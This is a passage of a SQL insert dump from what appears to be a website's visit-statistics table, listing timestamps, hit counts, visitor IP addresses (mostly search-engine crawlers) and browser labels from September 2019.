0,'87.250.224.65','other'),(449273,1568517437,1,1,0,0,'207.46.13.221','other'),(449274,1568518615,1,1,0,0,'207.46.13.221','other'),(449275,1568518710,1,1,0,0,'141.8.188.29','other'),(449276,1568518724,1,1,0,0,'141.8.188.11','other'),(449277,1568520510,1,1,0,0,'207.46.13.221','other'),(449278,1568520690,1,1,0,0,'141.8.188.29','other'),(449279,1568522793,1,1,0,0,'62.205.134.182','other'),(449280,1568526059,1,1,0,0,'141.8.188.11','other'),(449281,1568526114,1,1,0,0,'87.250.224.65','other'),(449282,1568526281,1,1,0,0,'8.29.198.26','other'),(449283,1568526471,1,1,0,0,'8.29.198.25','other'),(449284,1568527554,1,1,0,0,'37.9.113.103','other'),(449285,1568528615,1,1,0,0,'91.196.178.69','chrome'),(449286,1568529341,1,1,0,0,'207.46.13.221','other'),(449287,1568530228,1,1,0,0,'141.8.188.29','other'),(449288,1568530807,1,1,0,0,'207.46.13.221','other'),(449289,1568532108,1,1,0,0,'40.77.167.217','other'),(449290,1568532167,1,1,0,0,'213.133.163.98','chrome'),(449291,1568533150,2,2,0,0,'207.46.13.63','other'),(449292,1568533353,1,1,0,0,'66.249.66.134','chrome'),(449293,1568533355,1,1,0,0,'66.249.66.136','chrome'),(449294,1568533747,2,2,0,0,'207.46.13.225','other'),(449295,1568535232,1,1,0,0,'66.249.66.134','chrome'),(449296,1568536055,2,2,0,0,'40.77.167.217','other'),(449297,1568536152,1,1,0,0,'207.46.13.63','other'),(449298,1568536206,1,1,0,0,'66.249.66.136','chrome'),(449299,1568536228,1,1,0,0,'66.249.66.64','chrome'),(449300,1568536281,1,1,0,0,'66.249.66.134','chrome'),(449301,1568536788,1,1,0,0,'207.46.13.225','other'),(449302,1568536804,1,1,0,0,'194.44.182.162','chrome'),(449303,1568537134,2,2,0,0,'8.29.198.27','other'),(449304,1568537354,1,1,0,0,'66.249.66.134','chrome'),(449305,1568537437,1,1,0,0,'31.13.127.15','other'),(449306,1568538272,1,1,0,0,'141.8.188.29','other'),(449307,1568538533,4,4,0,0,'157.55.39.166','other'),(449308,1568538590,2,2,0,0,'207.46.13.225','other'),(449309,1568539532,1,1,0,0,'46.211.120.123','chrome'),(449310,1568539611,1,1,0,0,'157.55.39.141','other'),(449311,1568539638,1,1,0,0,'157.55.39.166','other'),(449312,1568540298,1,1,0,0,'207.46.13.225','other'),(449313,1568540540,1,1,0,0,'66.249.66.136','chrome'),(449314,1568541018,1,1,0,0,'141.8.188.11','other'),(449315,1568541720,2,2,0,0,'157.55.39.166','other'),(449316,1568541888,2,2,0,0,'207.46.13.225','other'),(449317,1568541961,1,1,0,0,'207.46.13.81','other'),(449318,1568542744,1,1,0,0,'157.55.39.166','other'),(449319,1568543208,1,1,0,0,'123.126.113.111','other'),(449320,1568543555,1,1,0,0,'66.249.66.136','chrome'),(449321,1568543577,2,2,0,0,'207.46.13.81','other'),(449322,1568544161,1,1,0,0,'66.249.66.138','chrome'),(449323,1568544280,1,1,0,0,'40.77.167.217','other'),(449324,1568544305,1,1,0,0,'66.249.66.64','chrome'),(449325,1568544598,2,2,0,0,'157.55.39.166','other'),(449326,1568544957,1,1,0,0,'66.249.66.66','chrome'),(449327,1568545022,1,1,0,0,'66.249.66.134','chrome'),(449328,1568545556,1,1,0,0,'40.77.167.217','other'),(449329,1568545848,1,1,0,0,'66.249.66.64','chrome'),(449330,1568545860,1,1,0,0,'109.74.154.72','chrome'),(449331,1568546000,1,1,0,0,'66.249.66.134','chrome'),(449332,1568546151,2,2,0,0,'40.77.167.13','other'),(449333,1568546264,1,1,0,0,'207.46.13.81','other'),(449334,1568546496,2,2,0,0,'66.249.66.136','chrome'),(449335,1568546614,2,2,0,0,'66.249.66.66','chrome'),(449336,1568546959,1,1,0,0,'157.55.39.166','other'),(449337,1568547300,1,1,0,0,'141.8.188.29','other'),(449338,1568547457,2,2,0,0,'207.46.13.81','other'),(449339,1568547678,1,1,0,0,'130.180.208.232','chrome'),(449340,1568547989,1,1,0,0,'8.29.198.25','other'),(449341,1568548158,1,1,0,0,'8.29.198.26','other'),(449342,1568548188,1,1,0,0,'66.249.66.68','chrome'),(449343,1568548266,1,1,0,0,'157.55.39.166','other'),(449344,1568548505,1,1,0,0,'178.154.171.24','other'),(449345,1568548528,2,1,1,0,'66.249.66.66',''),(449346,1568548558,1,1,0,0,'66.249.66.136','chrome'),(449347,1568549511,2,2,0,0,'35.184.189.112','chrome'),(449349,1568549530,1,1,0,0,'178.154.171.17','other'),(449350,1568549535,3,3,0,0,'35.225.192.192','chrome'),(449351,1568549549,3,3,0,0,'34.68.64.107','chrome'),(449352,1568549561,2,2,0,0,'35.194.10.210','chrome'),(449354,1568549579,3,3,0,0,'35.225.136.57','chrome'),(449355,1568549729,1,1,0,0,'157.55.39.166','other'),(449356,1568550979,1,1,0,0,'87.250.224.47','other'),(449357,1568551163,1,1,0,0,'5.228.50.77','msie'),(449358,1568551261,1,1,0,0,'207.46.13.81','other'),(449359,1568551395,1,0,1,0,'66.249.66.138',''),(449360,1568551489,1,1,0,0,'66.249.66.138','chrome'),(449361,1568551544,1,1,0,0,'157.55.39.91','other'),(449362,1568552020,1,1,0,0,'157.55.39.166','other'),(449363,1568552452,1,1,0,0,'66.249.66.66','chrome'),(449364,1568552456,1,1,0,0,'66.249.66.136','chrome'),(449365,1568552981,2,2,0,0,'207.46.13.81','other'),(449366,1568553211,1,1,0,0,'157.55.39.91','other'),(449367,1568553459,1,1,0,0,'207.46.13.102','other'),(449368,1568554067,1,1,0,0,'66.249.66.138','chrome'),(449369,1568554841,1,1,0,0,'138.246.253.5','chrome'),(449370,1568555014,1,1,0,0,'157.55.39.91','other'),(449371,1568555601,1,1,0,0,'66.249.66.136','chrome'),(449372,1568555810,1,1,0,0,'40.77.167.13','other'),(449373,1568555856,1,1,0,0,'66.249.66.138','chrome'),(449374,1568556043,1,1,0,0,'207.46.13.81','other'),(449375,1568556201,1,1,0,0,'5.45.207.19','other'),(449376,1568556294,3,3,0,0,'141.8.188.29','other'),(449377,1568556636,1,1,0,0,'66.249.66.134','chrome'),(449378,1568556708,1,1,0,0,'66.249.66.136','chrome'),(449379,1568556712,2,2,0,0,'207.46.13.223','other'),(449380,1568558221,4,4,0,0,'66.249.66.134','chrome'),(449381,1568558225,1,1,0,0,'40.77.167.13','other'),(449382,1568558318,2,2,0,0,'207.46.13.81','other'),(449383,1568558406,1,1,0,0,'66.249.66.136','chrome'),(449384,1568558829,2,2,0,0,'8.29.198.26','other'),(449385,1568559575,1,1,0,0,'66.249.66.134','chrome'),(449386,1568559618,2,2,0,0,'157.55.39.91','other'),(449387,1568559656,1,1,0,0,'66.249.66.138','chrome'),(449388,1568560008,1,1,0,0,'207.46.13.67','other'),(449389,1568560062,1,1,0,0,'207.46.13.223','other'),(449390,1568560222,1,1,0,0,'66.249.66.64','chrome'),(449391,1568560507,1,1,0,0,'66.249.66.134','chrome'),(449392,1568560537,3,3,0,0,'66.249.66.136','chrome'),(449393,1568560719,2,2,0,0,'157.55.39.91','other'),(449394,1568561374,1,1,0,0,'141.8.142.108','other'),(449395,1568561417,1,1,0,0,'207.46.13.81','other'),(449396,1568561575,1,1,0,0,'66.249.66.138','chrome'),(449397,1568562126,2,2,0,0,'157.55.39.143','other'),(449398,1568562489,2,2,0,0,'66.249.66.134','chrome'),(449399,1568562500,1,1,0,0,'66.249.66.136','chrome'),(449400,1568562514,1,1,0,0,'178.154.200.48','other'),(449401,1568562827,1,1,0,0,'5.45.207.19','other'),(449402,1568563076,1,1,0,0,'66.249.66.64','chrome'),(449403,1568563364,1,1,0,0,'66.249.66.138','chrome'),(449404,1568565014,1,1,0,0,'207.46.13.81','other'),(449405,1568565148,1,1,0,0,'66.249.66.66','chrome'),(449406,1568565171,1,1,0,0,'66.249.66.136','chrome'),(449407,1568565273,3,3,0,0,'207.46.13.67','other'),(449408,1568565564,1,1,0,0,'5.45.207.19','other'),(449409,1568565571,1,1,0,0,'141.8.142.103','other'),(449410,1568565697,1,1,0,0,'157.55.39.143','other'),(449411,1568566603,1,1,0,0,'66.249.66.138','chrome'),(449412,1568566615,2,2,0,0,'66.249.66.134','chrome'),(449413,1568566660,1,1,0,0,'66.249.66.64','chrome'),(449414,1568566833,1,1,0,0,'37.111.128.108','chrome'),(449415,1568567618,1,1,0,0,'141.8.188.11','other'),(449416,1568567897,1,1,0,0,'157.55.39.143','other'),(449417,1568567903,2,2,0,0,'66.249.66.66','chrome'),(449418,1568568191,1,1,0,0,'66.249.66.138','chrome'),(449419,1568568237,2,2,0,0,'66.249.66.134','chrome'),(449420,1568568343,2,2,0,0,'66.249.66.136','chrome'),(449421,1568568768,2,2,0,0,'207.46.13.67','other'),(449422,1568568850,1,1,0,0,'207.46.13.223','other'),(449423,1568568855,1,1,0,0,'157.55.39.143','other'),(449424,1568569347,1,1,0,0,'66.249.66.66','chrome'),(449425,1568569414,1,1,0,0,'66.249.66.134','chrome'),(449426,1568569434,1,1,0,0,'207.46.13.229','other'),(449427,1568569666,1,1,0,0,'8.29.198.26','other'),(449428,1568569845,1,1,0,0,'8.29.198.25','other'),(449429,1568570095,2,2,0,0,'157.55.39.143','other'),(449430,1568570363,1,1,0,0,'66.249.66.64','chrome'),(449431,1568570465,1,1,0,0,'66.249.66.134','chrome'),(449432,1568570619,1,1,0,0,'40.77.167.120','other'),(449433,1568571196,1,1,0,0,'141.8.188.29','other'),(449434,1568571307,3,3,0,0,'66.249.66.136','chrome'),(449435,1568571688,1,1,0,0,'66.249.66.134','chrome'),(449436,1568571729,3,3,0,0,'207.46.13.67','other'),(449437,1568571787,1,1,0,0,'207.46.13.223','other'),(449438,1568572007,2,2,0,0,'157.55.39.143','other'),(449439,1568572171,1,1,0,0,'40.77.167.140','other'),(449440,1568572609,1,1,0,0,'141.8.188.11','other'),(449441,1568573158,4,4,0,0,'157.55.39.143','other'),(449442,1568573219,1,1,0,0,'66.249.66.138','chrome'),(449443,1568573501,1,1,0,0,'87.250.224.120','other'),(449444,1568573537,1,1,0,0,'66.249.66.134','chrome'),(449445,1568573610,1,1,0,0,'141.8.188.29','other'),(449446,1568573811,1,1,0,0,'207.46.13.223','other'),(449447,1568574082,4,4,0,0,'157.55.39.10','other'),(449448,1568574095,1,1,0,0,'66.249.66.64','chrome'),(449449,1568574238,1,1,0,0,'40.77.167.75','other'),(449450,1568574501,1,1,0,0,'141.8.188.11','other'),(449451,1568574542,1,1,0,0,'157.55.39.143','other'),(449452,1568574806,2,2,0,0,'141.8.188.29','other'),(449453,1568574997,1,1,0,0,'128.71.38.35','chrome'),(449454,1568575122,1,1,0,0,'207.46.13.223','other'),(449455,1568575353,2,2,0,0,'66.249.66.138','chrome'),(449456,1568575394,1,1,0,0,'66.249.66.136','chrome'),(449457,1568575417,2,2,0,0,'66.249.66.134','chrome'),(449458,1568575581,1,1,0,0,'207.46.13.165','other'),(449459,1568575910,2,2,0,0,'141.8.188.29','other'),(449460,1568576037,2,2,0,0,'207.46.13.223','other'),(449461,1568576589,2,2,0,0,'66.249.66.136','chrome'),(449462,1568576591,1,1,0,0,'157.55.39.10','other'),(449463,1568577049,4,4,0,0,'66.249.66.134','chrome'),(449464,1568577424,2,2,0,0,'40.77.167.156','other'),(449465,1568577582,2,2,0,0,'66.249.66.136','chrome'),(449466,1568577654,1,1,0,0,'157.55.39.143','other'),(449467,1568578031,1,1,0,0,'5.45.207.19','other'),(449468,1568578033,1,1,0,0,'66.249.66.134','chrome'),(449469,1568578852,2,2,0,0,'66.249.66.136','chrome'),(449470,1568578927,1,1,0,0,'66.249.66.138','chrome'),(449471,1568579183,1,1,0,0,'157.55.39.143','other'),(449472,1568579410,2,2,0,0,'157.55.39.10','other'),(449473,1568579571,2,2,0,0,'157.55.39.172','other'),(449474,1568579772,1,1,0,0,'40.77.167.137','other'),(449475,1568579966,1,1,0,0,'66.249.66.134','chrome'),(449476,1568580044,1,1,0,0,'172.94.76.60','chrome'),(449477,1568580523,1,1,0,0,'8.29.198.25','other'),(449478,1568580537,1,1,0,0,'141.8.188.29','other'),(449479,1568580705,1,1,0,0,'8.29.198.27','other'),(449480,1568581169,1,1,0,0,'66.249.66.64','chrome'),(449481,1568581258,1,1,0,0,'66.249.66.136','chrome'),(449482,1568581695,1,1,0,0,'157.55.39.10','other'),(449483,1568581792,2,2,0,0,'66.249.66.138','chrome'),(449484,1568581874,2,2,0,0,'141.8.188.29','other'),(449485,1568582054,2,2,0,0,'66.249.66.134','chrome'),(449486,1568582198,1,1,0,0,'141.8.188.11','other'),(449487,1568582363,16,16,0,0,'148.66.147.16','other'),(449488,1568582667,1,1,0,0,'157.55.39.10','other'),(449489,1568582740,2,2,0,0,'157.55.39.172','other'),(449490,1568583351,2,2,0,0,'141.8.188.29','other'),(449491,1568583399,1,1,0,0,'66.249.66.66','chrome'),(449492,1568583699,1,1,0,0,'66.249.66.138','chrome'),(449493,1568584215,1,1,0,0,'157.55.39.143','other'),(449494,1568584428,2,2,0,0,'66.249.66.134','chrome'),(449495,1568584497,2,2,0,0,'157.55.39.172','other'),(449496,1568584900,2,2,0,0,'66.249.66.138','chrome'),(449497,1568585154,2,2,0,0,'207.46.13.25','other'),(449498,1568585738,1,1,0,0,'157.55.39.10','other'),(449499,1568586453,1,1,0,0,'157.55.39.143','other'),(449500,1568586459,1,1,0,0,'66.249.66.134','chrome'),(449501,1568586583,1,1,0,0,'141.8.188.11','other'),(449502,1568586626,1,1,0,0,'95.108.213.4','other'),(449503,1568586766,1,1,0,0,'66.249.66.66','chrome'),(449504,1568587561,1,1,0,0,'66.249.66.138','chrome'),(449505,1568588384,2,2,0,0,'157.55.39.143','other'),(449506,1568588874,1,1,0,0,'157.55.39.10','other'),(449507,1568589029,1,1,0,0,'207.46.13.25','other'),(449508,1568589120,1,1,0,0,'157.55.39.129','other'),(449509,1568589244,1,1,0,0,'66.249.66.134','chrome'),(449510,1568589778,2,2,0,0,'157.55.39.172','other'),(449511,1568590498,3,3,0,0,'66.249.66.138','chrome'),(449512,1568590816,2,2,0,0,'141.8.188.11','other'),(449513,1568590820,1,1,0,0,'157.55.39.129','other'),(449514,1568591018,2,2,0,0,'66.249.66.134','chrome'),(449515,1568591293,1,1,0,0,'157.55.39.172','other'),(449516,1568591377,1,1,0,0,'8.29.198.26','other'),(449517,1568591465,1,1,0,0,'141.8.188.29','other'),(449518,1568591548,1,1,0,0,'8.29.198.27','other'),(449519,1568591845,1,1,0,0,'66.249.66.136','chrome'),(449520,1568592429,1,1,0,0,'141.8.188.11','other'),(449521,1568592611,2,2,0,0,'157.55.39.10','other'),(449522,1568593424,2,2,0,0,'157.55.39.129','other'),(449523,1568593724,2,2,0,0,'66.249.66.136','chrome'),(449524,1568593739,4,4,0,0,'66.249.66.134','chrome'),(449525,1568594088,1,1,0,0,'66.249.66.68','chrome'),(449526,1568594426,1,1,0,0,'66.249.66.138','chrome'),(449527,1568594476,1,1,0,0,'207.46.13.25','other'),(449528,1568594673,14,14,0,0,'34.66.22.127','firefox'),(449529,1568594781,2,2,0,0,'66.249.66.134','chrome'),(449530,1568594809,2,2,0,0,'141.8.188.29','other'),(449531,1568595585,3,3,0,0,'66.249.66.138','chrome'),(449532,1568595971,2,2,0,0,'66.249.66.134','chrome'),(449533,1568596159,2,2,0,0,'157.55.39.172','other'),(449534,1568596255,1,1,0,0,'207.46.13.15','other'),(449535,1568597203,1,1,0,0,'66.249.66.134','chrome'),(449536,1568597372,1,1,0,0,'66.249.66.68','chrome'),(449537,1568597680,1,1,0,0,'66.249.66.136','chrome'),(449538,1568597867,1,1,0,0,'207.46.13.25','other'),(449539,1568597967,1,1,0,0,'207.46.13.15','other'),(449540,1568598190,1,1,0,0,'66.249.66.66','chrome'),(449541,1568598475,1,1,0,0,'157.55.39.129','other'),(449542,1568598775,2,2,0,0,'157.55.39.172','other'),(449543,1568598868,2,2,0,0,'207.46.13.25','other'),(449544,1568599026,2,2,0,0,'66.249.66.136','chrome'),(449545,1568599155,1,1,0,0,'66.249.66.134','chrome'),(449546,1568599409,1,1,0,0,'66.249.66.138','chrome'),(449547,1568599931,1,1,0,0,'157.55.39.172','other'),(449548,1568600519,1,1,0,0,'66.249.66.138','chrome'),(449549,1568600651,2,2,0,0,'157.55.39.129','other'),(449550,1568600927,1,1,0,0,'31.13.115.15','other'),(449551,1568601137,1,1,0,0,'207.46.13.25','other'),(449552,1568602042,1,1,0,0,'207.46.13.15','other'),(449553,1568602143,1,1,0,0,'35.198.237.235','firefox'),(449554,1568602212,1,1,0,0,'8.29.198.26','other'),(449555,1568602244,2,2,0,0,'66.249.66.136','chrome'),(449556,1568602391,1,1,0,0,'8.29.198.25','other'),(449557,1568602482,1,1,0,0,'37.9.113.20','other'),(449558,1568602589,1,1,0,0,'141.8.188.11','other'),(449559,1568602632,1,1,0,0,'157.55.39.129','other'),(449560,1568602934,1,1,0,0,'157.55.39.172','other'),(449561,1568603218,2,2,0,0,'66.249.66.134','chrome'),(449562,1568603263,1,1,0,0,'66.249.66.64','chrome'),(449563,1568603813,1,1,0,0,'37.9.113.20','other'),(449564,1568603995,1,1,0,0,'207.46.13.15','other'),(449565,1568604046,1,1,0,0,'141.8.188.29','other'),(449566,1568604459,1,1,0,0,'157.55.39.172','other'),(449567,1568605124,1,1,0,0,'66.249.66.134','chrome'),(449568,1568605335,1,1,0,0,'40.77.167.145','other'),(449569,1568605548,1,1,0,0,'157.55.39.129','other'),(449570,1568606231,1,1,0,0,'157.55.39.236','other'),(449571,1568606508,1,1,0,0,'207.46.13.15','other'),(449572,1568606672,1,1,0,0,'141.8.188.29','other'),(449573,1568607972,1,1,0,0,'141.8.188.29','other'),(449574,1568607986,1,1,0,0,'40.77.167.34','other'),(449575,1568608012,1,1,0,0,'66.249.66.68','chrome'),(449576,1568608081,1,1,0,0,'66.249.66.136','chrome'),(449577,1568608552,2,2,0,0,'207.46.13.15','other'),(449578,1568608665,2,2,0,0,'157.55.39.170','other'),(449579,1568608932,2,2,0,0,'141.8.188.29','other'),(449580,1568609131,1,1,0,0,'62.205.134.182','other'),(449581,1568610937,1,1,0,0,'207.46.13.15','other'),(449582,1568610997,2,2,0,0,'40.77.167.159','other'),(449583,1568611001,1,1,0,0,'157.55.39.217','other'),(449584,1568611007,1,1,0,0,'157.55.39.147','other'),(449585,1568611568,2,2,0,0,'66.249.66.134','chrome'),(449586,1568611729,4,4,0,0,'66.249.66.136','chrome'),(449587,1568611741,1,1,0,0,'66.249.66.138','chrome'),(449588,1568611899,1,1,0,0,'66.249.66.68','chrome'),(449589,1568612005,1,1,0,0,'141.8.188.11','other'),(449590,1568612862,14,14,0,0,'34.66.22.127','firefox'),(449591,1568612865,1,1,0,0,'157.55.39.147','other'),(449592,1568613048,1,1,0,0,'8.29.198.25','other'),(449593,1568613224,1,1,0,0,'8.29.198.26','other'),(449594,1568613483,1,1,0,0,'141.8.188.11','other'),(449595,1568613891,1,1,0,0,'66.249.66.136','chrome'),(449596,1568614112,1,1,0,0,'66.249.66.138','chrome'),(449597,1568614138,1,1,0,0,'37.52.20.106','chrome'),(449598,1568614884,1,1,0,0,'40.77.167.58','other'),(449599,1568615049,1,1,0,0,'66.249.66.134','chrome'),(449600,1568615202,1,1,0,0,'66.249.66.68','chrome'),(449601,1568615319,1,1,0,0,'40.77.167.178','other'),(449602,1568615843,2,2,0,0,'66.249.66.138','chrome'),(449603,1568616006,3,3,0,0,'66.249.66.136','chrome'),(449604,1568616220,1,1,0,0,'66.249.66.134','chrome'),(449605,1568616839,1,1,0,0,'157.55.39.147','other'),(449606,1568617451,2,2,0,0,'66.249.66.138','chrome'),(449607,1568617848,1,1,0,0,'66.249.66.68','chrome'),(449608,1568618089,1,1,0,0,'40.77.167.159','other'),(449609,1568619030,1,1,0,0,'5.45.207.79','other'),(449610,1568619140,4,4,0,0,'157.55.39.147','other'),(449611,1568619188,1,1,0,0,'141.8.188.29','other'),(449612,1568619192,1,1,0,0,'141.8.188.11','other'),(449613,1568620373,1,1,0,0,'194.44.29.146','chrome'),(449614,1568620527,1,1,0,0,'141.8.188.29','other'),(449615,1568620601,1,1,0,0,'141.8.188.11','other'),(449616,1568620642,1,1,0,0,'66.249.66.136','chrome'),(449617,1568621029,1,1,0,0,'66.249.66.64','chrome'),(449618,1568621309,1,1,0,0,'40.77.167.159','other'),(449619,1568621532,1,1,0,0,'91.196.178.172','chrome'),(449620,1568622286,126,126,0,0,'89.163.242.18','other'),(449621,1568623190,111,111,0,0,'89.163.242.18','other'),(449622,1568623222,1,1,0,0,'66.249.66.138','chrome'),(449623,1568623907,1,1,0,0,'8.29.198.25','other'),(449624,1568624051,1,1,0,0,'8.29.198.27','other'),(449625,1568624363,1,1,0,0,'66.249.66.64','chrome'),(449626,1568624465,1,1,0,0,'207.46.13.117','other'),(449627,1568624679,1,1,0,0,'91.196.177.134','chrome'),(449628,1568624783,1,1,0,0,'40.77.167.152','other'),(449629,1568624795,2,2,0,0,'66.249.66.136','chrome'),(449630,1568625186,3,3,0,0,'66.249.66.134','chrome'),(449631,1568626518,1,1,0,0,'66.249.66.134','chrome'),(449632,1568626909,1,1,0,0,'66.249.66.136','chrome'),(449633,1568627159,2,2,0,0,'13.66.139.0','other'),(449634,1568627392,1,1,0,0,'40.77.167.149','other'),(449635,1568627511,1,1,0,0,'66.249.66.134','chrome'),(449636,1568628566,2,2,0,0,'40.77.167.152','other'),(449637,1568628685,1,1,0,0,'66.249.66.66','chrome'),(449638,1568628712,1,1,0,0,'193.107.104.186','chrome'),(449639,1568628978,1,1,0,0,'66.249.66.138','chrome'),(449640,1568629276,1,1,0,0,'207.46.13.46','other'),(449641,1568630143,2,2,0,0,'66.249.66.138','chrome'),(449642,1568630340,2,2,0,0,'66.249.66.134','chrome'),(449643,1568630410,1,1,0,0,'87.250.224.65','other'),(449644,1568630892,1,1,0,0,'91.196.178.73','firefox'),(449645,1568631099,1,1,0,0,'66.249.66.136','chrome'),(449646,1568631219,1,1,0,0,'40.77.167.149','other'),(449647,1568631247,1,1,0,0,'207.46.13.46','other'),(449648,1568631391,2,2,0,0,'66.249.66.134','chrome'),(449649,1568631398,1,1,0,0,'66.249.66.64','chrome'),(449650,1568631409,1,1,0,0,'66.249.66.66','chrome'),(449651,1568632173,1,1,0,0,'141.8.188.11','other'),(449652,1568632283,1,1,0,0,'207.46.13.117','other'),(449653,1568632315,1,1,0,0,'66.249.66.134','chrome'),(449654,1568633116,2,2,0,0,'66.249.66.136','chrome'),(449655,1568633479,1,1,0,0,'207.46.13.117','other'),(449656,1568633778,1,1,0,0,'141.8.188.29','other'),(449657,1568633998,1,1,0,0,'40.77.167.149','other'),(449658,1568634394,2,2,0,0,'157.55.39.46','other'),(449659,1568634625,1,1,0,0,'207.46.13.46','other'),(449660,1568634753,2,2,0,0,'8.29.198.25','other'),(449661,1568634759,1,1,0,0,'66.249.66.64','chrome'),(449662,1568635023,1,1,0,0,'207.46.13.117','other'),(449663,1568635401,1,1,0,0,'66.249.66.138','chrome'),(449664,1568635959,9,9,0,0,'34.66.178.144','chrome'),(449665,1568635992,2,2,0,0,'35.225.4.228','chrome'),(449667,1568636002,2,2,0,0,'34.68.62.134','chrome'),(449669,1568636166,1,1,0,0,'66.249.66.68','chrome'),(449670,1568636382,1,1,0,0,'66.249.66.64','chrome'),(449671,1568636450,1,1,0,0,'141.8.188.29','other'),(449672,1568636470,2,2,0,0,'40.77.167.149','other'),(449673,1568636793,2,2,0,0,'66.249.66.138','chrome'),(449674,1568637537,2,2,0,0,'91.196.179.134','chrome'),(449675,1568637788,5,5,0,0,'207.46.13.117','other'),(449676,1568637810,2,2,0,0,'91.196.178.184','chrome'),(449677,1568638079,1,1,0,0,'207.46.13.46','other'),(449678,1568638311,1,1,0,0,'91.196.178.84','chrome'),(449679,1568638391,1,1,0,0,'40.77.167.149','other'),(449680,1568638395,2,2,0,0,'157.55.39.46','other'),(449681,1568638773,1,1,0,0,'198.16.70.28','chrome'),(449682,1568638777,1,1,0,0,'109.74.154.72','chrome'),(449683,1568639525,1,1,0,0,'95.108.213.4','other'),(449684,1568640385,1,1,0,0,'207.46.13.117','other'),(449685,1568640627,2,2,0,0,'40.77.167.149','other'),(449686,1568641116,1,1,0,0,'66.249.66.134','chrome'),(449687,1568642258,2,2,0,0,'207.46.13.117','other'),(449688,1568642540,3,3,0,0,'207.46.13.46','other'),(449689,1568642564,1,1,0,0,'5.45.207.79','other'),(449690,1568642601,1,1,0,0,'66.249.66.136','chrome'),(449691,1568642781,1,1,0,0,'66.249.66.138','chrome'),(449692,1568642971,4,4,0,0,'40.77.167.149','other'),(449693,1568643188,1,1,0,0,'66.249.66.66','chrome'),(449694,1568644539,1,1,0,0,'40.77.167.149','other'),(449695,1568644807,2,2,0,0,'157.55.39.46','other'),(449696,1568645270,1,1,0,0,'95.132.37.216','chrome'),(449697,1568645417,1,1,0,0,'207.46.13.46','other'),(449698,1568645572,2,2,0,0,'141.8.188.29','other'),(449699,1568645612,2,2,0,0,'8.29.198.27','other'),(449700,1568645735,1,1,0,0,'66.249.66.64','chrome'),(449701,1568646192,1,1,0,0,'66.249.66.136','chrome'),(449702,1568646796,2,2,0,0,'157.55.39.46','other'),(449703,1568646846,1,1,0,0,'157.55.39.67','other'),(449704,1568648065,4,4,0,0,'66.249.66.138','chrome'),(449705,1568648182,2,2,0,0,'66.249.66.134','chrome'),(449706,1568648282,1,1,0,0,'207.46.13.46','other'),(449707,1568648428,1,1,0,0,'66.249.66.136','chrome'),(449708,1568648530,1,1,0,0,'95.108.213.4','other'),(449709,1568648625,1,1,0,0,'178.154.171.60','other'),(449710,1568648705,2,2,0,0,'207.46.13.117','other'),(449711,1568649459,1,1,0,0,'66.249.66.138','chrome'),(449712,1568649561,3,3,0,0,'66.249.66.136','chrome'),(449713,1568649694,1,1,0,0,'66.249.66.64','chrome'),(449714,1568649705,1,1,0,0,'66.249.66.134','chrome'),(449715,1568649762,1,1,0,0,'91.196.178.73','firefox'),(449716,1568649920,1,1,0,0,'207.46.13.117','other'),(449717,1568650223,1,1,0,0,'157.55.39.46','other'),(449718,1568650418,1,1,0,0,'157.55.39.67','other'),(449719,1568650486,1,1,0,0,'66.249.66.136','chrome'),(449720,1568650664,1,1,0,0,'66.249.66.64','chrome'),(449721,1568650722,1,1,0,0,'91.196.178.185','chrome'),(449722,1568650813,2,2,0,0,'66.249.66.138','chrome'),(449723,1568651112,1,1,0,0,'207.46.13.15','other'),(449724,1568651153,1,1,0,0,'66.249.66.134','chrome'),(449725,1568651719,1,1,0,0,'5.45.207.19','other'),(449726,1568652986,2,2,0,0,'157.55.39.67','other'),(449727,1568653051,1,1,0,0,'66.249.66.136','chrome'),(449728,1568653182,14,14,0,0,'34.66.22.127','firefox'),(449729,1568653212,1,1,0,0,'66.249.66.68','chrome'),(449730,1568653246,1,1,0,0,'141.8.188.29','other'),(449731,1568653411,2,2,0,0,'66.249.66.134','chrome'),(449732,1568653578,1,1,0,0,'66.249.66.138','chrome'),(449733,1568654316,1,1,0,0,'207.46.13.15','other'),(449734,1568655304,1,1,0,0,'91.196.178.54','chrome'),(449735,1568655826,1,1,0,0,'40.77.167.82','other'),(449736,1568656405,1,1,0,0,'157.55.39.224','other'),(449737,1568656444,1,1,0,0,'141.8.142.108','other'),(449738,1568656475,1,1,0,0,'8.29.198.25','other'),(449739,1568656621,1,1,0,0,'8.29.198.26','other'),(449740,1568657055,1,1,0,0,'157.55.39.46','other'),(449741,1568657349,1,1,0,0,'130.180.217.0','chrome'),(449742,1568657899,1,1,0,0,'40.77.167.82','other'),(449743,1568658020,1,1,0,0,'66.249.66.68','chrome'),(449744,1568658252,1,1,0,0,'66.249.66.138','chrome'),(449745,1568658259,1,1,0,0,'40.77.167.153','other'),(449746,1568658493,1,1,0,0,'46.211.239.152','chrome'),(449747,1568658861,1,1,0,0,'40.77.167.82','other'),(449748,1568659165,1,1,0,0,'157.55.39.224','other'),(449749,1568659263,1,1,0,0,'66.249.66.136','chrome'),(449750,1568659434,1,1,0,0,'178.133.37.22','chrome'),(449751,1568659723,1,1,0,0,'40.77.167.153','other'),(449752,1568660304,1,1,0,0,'66.249.66.138','chrome'),(449753,1568660388,1,1,0,0,'66.249.66.136','chrome'),(449754,1568660563,2,2,0,0,'66.249.66.134','chrome'),(449755,1568661473,1,1,0,0,'66.249.66.134','chrome'),(449756,1568661686,1,1,0,0,'141.8.188.11','other'),(449757,1568662138,1,1,0,0,'207.46.13.15','other'),(449758,1568662170,1,1,0,0,'40.77.167.82','other'),(449759,1568662223,1,1,0,0,'66.249.66.136','chrome'),(449760,1568663257,1,1,0,0,'157.55.39.224','other'),(449761,1568664357,2,2,0,0,'66.249.66.134','chrome'),(449762,1568664519,2,2,0,0,'95.213.141.126','opera'),(449763,1568664559,1,1,0,0,'207.46.13.15','other'),(449764,1568664855,1,1,0,0,'157.55.39.224','other'),(449765,1568664895,3,3,0,0,'66.249.66.136','chrome'),(449766,1568664935,2,2,0,0,'91.200.126.149','other'),(449767,1568665666,1,1,0,0,'40.77.167.153','other'),(449768,1568665710,2,2,0,0,'40.77.167.82','other'),(449769,1568666851,3,3,0,0,'157.55.39.224','other'),(449770,1568667042,1,1,0,0,'66.249.66.136','chrome'),(449771,1568667118,1,1,0,0,'40.77.167.82','other'),(449772,1568667330,2,2,0,0,'8.29.198.27','other'),(449773,1568667627,1,1,0,0,'66.249.66.138','chrome'),(449774,1568667971,1,1,0,0,'141.8.188.11','other'),(449775,1568669058,1,1,0,0,'40.77.167.153','other'),(449776,1568669369,1,1,0,0,'213.180.203.9','other'),(449777,1568670127,1,1,0,0,'40.77.167.37','other'),(449778,1568670865,1,1,0,0,'185.137.234.20','chrome'),